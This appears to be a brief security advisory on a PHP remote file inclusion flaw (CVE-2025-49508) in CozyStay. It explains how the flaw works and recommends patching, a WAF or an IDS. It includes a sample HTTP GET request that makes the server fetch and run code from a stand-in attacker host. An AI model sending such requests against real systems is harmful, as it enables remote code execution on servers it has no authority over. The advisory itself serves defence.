How the Exploit Works
The PHP Remote File Inclusion vulnerability arises from improper control of filename for include/require statement in CozyStay’s PHP program. This allows an attacker to inject a path to a remote file, which the PHP interpreter will download and execute. This could enable an attacker to execute arbitrary PHP code, potentially leading to full system compromise or data leakage.
Conceptual Example Code
Below is a conceptual example of how the vulnerability might be exploited. This is a hypothetical HTTP request that sends a malicious payload to a vulnerable endpoint on the target server:
GET /vulnerable/page.php?file=http://attacker.com/malicious_script.txt HTTP/1.1
Host: target.example.com
In the above example, `http://attacker.com/malicious_script.txt` is a remote file containing malicious PHP code. The server would download and execute this script, compromising the system.
How to Mitigate
To mitigate the CVE-2025-49508 vulnerability, it is recommended to apply the vendor patch as soon as it becomes available. In the meantime, using a Web Application Firewall (WAF) or Intrusion Detection System (IDS) can serve as a temporary mitigation measure. These tools can be configured to detect and block attempts to exploit PHP Remote File Inclusion vulnerabilities.
